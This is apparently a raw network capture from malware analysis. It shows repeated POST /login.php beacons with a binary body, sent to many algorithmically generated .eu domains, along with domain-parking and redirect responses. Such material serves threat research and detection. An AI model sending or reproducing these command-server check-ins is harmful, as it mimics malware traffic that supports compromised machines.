POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: keraborigin.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Fri, 20 Nov 2015 09:09:43 GMT

Server: Apache/2.4.7 (Ubuntu)

Content-Length: 286

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address
>.</body></html>.....


POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: keraborigin.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Fri, 20 Nov 2015 09:09:43 GMT

Server: Apache/2.4.7 (Ubuntu)

Content-Length: 286

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address
>.</body></html>.HTTP/1.1 404 Not Found..Date: Fri, 20 
Nov 2015 09:09:43 GMT..Server: Apache/2.4.7 (Ubuntu)..Content-Length: 
286..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PU
BLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<titl
e>404 Not Found</title>.</head><body>.<h1>N
ot Found</h1>.<p>The requested URL /login.php was not foun
d on this server.</p>.<hr>.<address>Apache/2.4.7 (Ub
untu) Server at keraborigin.eu Port 80</address>.</body>&l
t;/html>...

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.rynyhipexon.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:41 GMT

Server: Apache

Set-Cookie: vsid=905vr1955561817007335; expires=Wed, 18-Nov-2020 09:09:41 GMT; path=/; domain=ww92.rynyhipexon.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XogFpIWeIpJr5PYCNL QDXuaD8wjub0G2TCf1f5AfmcIV/0YQtuvLTHzpln PfYWkIyXNLhB3uNWrDOfYM8xog==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=63

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XogFpIWeIpJr5PYCNL QDXua
D8wjub0G2TCf1f5AfmcIV/0YQtuvLTHzpln PfYWkIyXNLhB3uNWrDOfYM8xog==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.rynyhipexon.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.rynyhipexon.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.rynyhipexon.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="tex
t-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p
></center></noscript>..<div id="rmgblock" width="100
%" height="100%"></div>..<script type="text/javascript" sr
c="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.rynyhipex
on.eu"></script>..<script type="text/javascript" language=
"JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark
/show_afd_ads.js"></script>..<script type="text/javascript
"> function collectHeight(){try{var e=Math.max(document.documen<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lykemujebeq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.lykemujebeq.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.lykemujebeq.e
u..Vary: Accept-Encoding..

GET /domain/jewuqyjywyv.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=71c55851e5901a95263b027885fa0411; domain=.jewuqyjywyv.eu

Location: hXXp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411

3e..Go hXXp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411..0.
.

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nojejecebuw.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:20 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/nojejecebuw.eu

Set-Cookie: btst=b36799928aa683da3e97e7666bae6fc8|194.242.96.218|1448010560|1448010560|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

GET /domain/tucyguqaciq.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=d1e2832667be3ac8af2587e3c0958424; domain=.tucyguqaciq.eu

Location: hXXp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424

3e..Go hXXp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424..0.
.

GET /f89965e1c0417ff83998ff3762e77e38 HTTP/1.1

Host: xsso.ciliqikytec.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=429cf1fb2eaac1d730774bf27097da95|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=f89965e1c0417ff83998ff3762e77e38; domain=.ciliqikytec.eu
19..Landed ciliqikytec.eu<br>..0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.xuqufyduras.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:48 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;xuqufyduras.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'xuqufyduras.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU2NC42MDM4OjM1MDBjNzg2MmVhZjA4MDhjZjQ0Zjk
zOGE4MmI0YjY1ODAyZDUzYjQxMGQ3MTBhNjUxZGU0M2Y2NjdiNmY0NjE6NTY0ZWUzNDQ5M
zZlZA==';.var clickTracking = false;.var themedata = '';.var xkw = '';
.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var
 clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off
';.var scriptPath = '';...</script>...<script src='hXXp://par
kingcrew.net/assets/scripts/js3.js' type='text/javascript' language='J
avaScript'></script>...<script type='text/javascript' lang
uage='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4
NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTM0NDhiMjY2fHx8MTQ0ODAxMDU2NC
42MDk5fGZjYThkMGFmZTdhZTU3NWZkYmViYzZlNzRlNmJkNmQ4NTQxMmQ1MTV8fHx8fDF8
fHwwfDU2NGVlMzQ0MTM1MzVmYjUzZThiNTA2M3x8fDB8fHx8fHwwfHx8fHx8fHx8';<
/script>..</head>..<body>...<script type='text/javas
cript' language='JavaScript'>.window.onload = function() {..if(clic
kTracking && typeof track_onclick == 'function') track_onclick("899acb
ee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ciliqikytec.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/ciliqikytec.eu

Set-Cookie: btst=429cf1fb2eaac1d730774bf27097da95|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.kevedorozup.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:04 GMT

Server: Apache

Set-Cookie: vsid=918vr1955561445810499; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.kevedorozup.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pCSuho4Rz2cFO6ztB/gVCEwEzGaOY4/zxPU34OpnSoSTVObfw1vkuwKwAjb1u/rzaQ58oMADjyaRB1YttOPnbQ==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=104

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pCSuho4Rz2cFO6ztB/gVCEwE
zGaOY4/zxPU34OpnSoSTVObfw1vkuwKwAjb1u/rzaQ58oMADjyaRB1YttOPnbQ==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.kevedorozup.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.kevedorozup.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.kevedorozup.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="tex
t-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p
></center></noscript>..<div id="rmgblock" width="100
%" height="100%"></div>..<script type="text/javascript" sr
c="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.kevedoroz
up.eu"></script>..<script type="text/javascript" language=
"JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark
/show_afd_ads.js"></script>..<script type="text/javascript
"> function collectHeight(){try{var e=Math.max(document.documen<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: digusebyvad.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:22:15 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.digusebyvad.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:15 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.digusebyva
d.eu..Vary: Accept-Encoding..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.dimutobihom.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:00 GMT

Server: Apache

Set-Cookie: vsid=918vr1955561406202917; expires=Wed, 18-Nov-2020 09:09:00 GMT; path=/; domain=ww92.dimutobihom.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Mic7DvRpvetI juA8PXbn52KQPN AbsmtkknMs383riOTAcQmT9M10mpQJ6vSG50WzlfUtULM2gARrNlntDjZA==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=116

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Mic7DvRpvetI juA8PXbn52K
QPN AbsmtkknMs383riOTAcQmT9M10mpQJ6vSG50WzlfUtULM2gARrNlntDjZA==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.dimutobihom.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.dimutobihom.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.dimutobihom.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="tex
t-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p
></center></noscript>..<div id="rmgblock" width="100
%" height="100%"></div>..<script type="text/javascript" sr
c="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.dimutobih
om.eu"></script>..<script type="text/javascript" language=
"JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark
/show_afd_ads.js"></script>..<script type="text/javascript
"> function collectHeight(){try{var e=Math.max(document.documen<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.nozulufynax.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:49 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;nozulufynax.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'nozulufynax.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU2NS42Njk3OjQxNzNkNDE0ZTc3YTdhZjMyZDBmY2Y
1ODQxZjA4MjlhZjIyMjNkNTE2NzUyYjUzYmRhYTQ0MjJiNGM4MmM4ZWI6NTY0ZWUzNDVhM
zg2MQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';
.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var
 clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off
';.var scriptPath = '';...</script>...<script src='hXXp://par
kingcrew.net/assets/scripts/js3.js' type='text/javascript' language='J
avaScript'></script>...<script type='text/javascript' lang
uage='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4
NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM0NTljY2U2fHx8MTQ0ODAxMDU2NS
42NzQ2fGI2NDQ2N2RkZTVhMjJmNjdiZjYyYWMwZmNlYjM1OTU3ODdiOTBiMzV8fHx8fDF8
fHwwfDU2NGVlMzQ1MTU1MzVmMDMyOThiNjNkYnx8fDB8fHx8fHwwfHx8fHx8fHx8';<
/script>..</head>..<body>...<script type='text/javas
cript' language='JavaScript'>.window.onload = function() {..if(clic
kTracking && typeof track_onclick == 'function') track_onclick("899acb
ee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.norumikemem.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:28 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;norumikemem.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'norumikemem.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU0NC40NDU3Ojk4OTkwOGUwMWZmNTQxYTZlOTU2MjF
hZDcwNTI2MzFlZjVhZDY3MmRkMWVhMjk5ODc1NjY5YzYxYzI2ZWVkY2Y6NTY0ZWUzMzA2Y
2QyMQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';
.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var
 clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off
';.var scriptPath = '';...</script>...<script src='hXXp://par
kingcrew.net/assets/scripts/js3.js' type='text/javascript' language='J
avaScript'></script>...<script type='text/javascript' lang
uage='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4
NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzMDZiMjczfHx8MTQ0ODAxMDU0NC
40NTI0fDNjMzU2MWFjNGM5NmZlYTAzNTljY2M3YjRiODJhNTk0NWU3ZjZmNDB8fHx8fDF8
fHwwfDU2NGVlMzMwMTM1MzVmNzI0MjhiNGZhZXx8fDB8fHx8fHwwfHx8fHx8fHx8';<
/script>..</head>..<body>...<script type='text/javas
cript' language='JavaScript'>.window.onload = function() {..if(clic
kTracking && typeof track_onclick == 'function') track_onclick("899acb
ee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.lyvufixyvet.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:19:04 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;lyvufixyvet.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'lyvufixyvet.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU4MC41MzMxOmEzZmNhYWY4MGRlNmIyZGZjZjU4Mjk
wZWY2OWNiY2U2Y2IwYThmNTFkYzdiOTQxYzE2ZGI5NmY4YzY5Nzk4ZmI6NTY0ZWUzNTQ4M
jI4Nw==';.var clickTracking = false;.var themedata = '';.var xkw = '';
.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var
 clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off
';.var scriptPath = '';...</script>...<script src='hXXp://par
kingcrew.net/assets/scripts/js3.js' type='text/javascript' language='J
avaScript'></script>...<script type='text/javascript' lang
uage='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4
NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM1NDgxMWQzfHx8MTQ0ODAxMDU4MC
41Mzh8YTRlZWY3YmVhYjlkNjk3YmFmNWI0MzhlYzM2YTRiNWYxMDkxMDU4NHx8fHx8MXx8
fDB8NTY0ZWUzNTQ4OGZiY2UxYWFmOGI0OWE0fHx8MHx8fHx8fDB8fHx8fHx8fHw=';<
/script>..</head>..<body>...<script type='text/javas
cript' language='JavaScript'>.window.onload = function() {..if(clic
kTracking && typeof track_onclick == 'function') track_onclick("899acb
ee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyvufixyvet.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:22:10 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.lyvufixyvet.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:10 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.lyvufixyvet.e
u..Vary: Accept-Encoding..

GET /zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525 HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ze1.zeroredirect1.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Cache-Control: no-store, no-cache, pre-check=0, post-check=0

content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'

x-content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'

X-WebKit-CSP: default-src 'self'; script-src 'self' 'unsafe-inline'

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Date: Fri, 20 Nov 2015 09:08:59 GMT

Server: ZeroPark-Traffic
3ed..<!DOCTYPE html>.<html>..<head>...<META http-
equiv="refresh" content="1;URL='hXXp://ze1.zeroredirect2.com/zcredirec
t?visitid=56383af2-8f66-11e5-9f3b-06d3db30a525&type=meta'">..</h
ead>..<body>...<script type="text/javascript">....setTi
meout(function () {.....var pageWidth = window.innerWidth ? window.inn
erWidth : (document.documentElement && document.documentElement.client
Width ? document.documentElement.clientWidth : document.getElementsByT
agName('body')[0].clientWidth);.....var pageHeight = window.innerHeigh
t ? window.innerHeight : (document.documentElement && document.documen
tElement.clientHeight ? document.documentElement.clientHeight : docume
nt.getElementsByTagName('body')[0].clientHeight);.....var iframeDetect
ed = window.self !== window.top;.....window.location="hXXp://ze1.zeror
edirect2.com/zcredirect?visitid=56383af2-8f66-11e5-9f3b-06d3db30a525&t
ype=js&browserWidth="   pageWidth  "&browserHeight="   pageHeight  "&i
frameDetected="   iframeDetected;....}, 1);...</script>..</bo
dy>.</html>..0..HTTP/1.1 200 OK..Cache-Control: no-store, no-
